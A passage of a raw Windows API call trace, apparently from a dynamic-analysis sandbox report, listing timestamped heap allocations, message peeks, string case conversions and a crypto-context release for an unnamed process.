lpsz="A3800201A3B") returned 0xb [0264.647] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.648] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.648] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.648] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.648] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.648] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.648] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.648] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.648] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.649] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.649] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.649] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.649] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.649] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.650] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.650] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.651] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.651] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.651] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.651] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.651] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.651] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.652] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.654] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0264.655] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.655] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0264.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.656] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.656] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.656] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.657] FreeLibrary (hLibModule=0x74d40000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.657] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.657] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, 